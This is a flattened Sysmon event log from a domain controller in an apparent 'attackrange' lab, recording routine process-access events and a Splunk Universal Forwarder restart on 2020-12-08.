13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006836Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006835Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006834Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006833Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006832Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006831Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006830Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E5-5FCF-0901-000000009101}2568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006829Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-85E5-5FCF-0801-000000009101}42803180C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{10ACEC4A-85E5-5FCF-0901-000000009101}2568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+146d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006828Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.680{10ACEC4A-85E5-5FCF-0901-000000009101}2568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E5-5FCF-0801-000000009101}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=3080 10341000x80000000000000006827Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E5-5FCF-0801-000000009101}4280C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006826Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006825Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006824Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006823Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006822Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006821Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006820Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006819Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006818Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006817Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E5-5FCF-0801-000000009101}4280C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006816Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-85E5-5FCF-0701-000000009101}46444636C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85E5-5FCF-0801-000000009101}4280C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d40f|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006815Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.671{10ACEC4A-85E5-5FCF-0801-000000009101}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=3080C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{10ACEC4A-85E5-5FCF-0701-000000009101}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=3080 10341000x80000000000000006814Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.654{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E5-5FCF-0701-000000009101}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006813Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.654{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006812Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.654{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006811Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.654{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006810Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 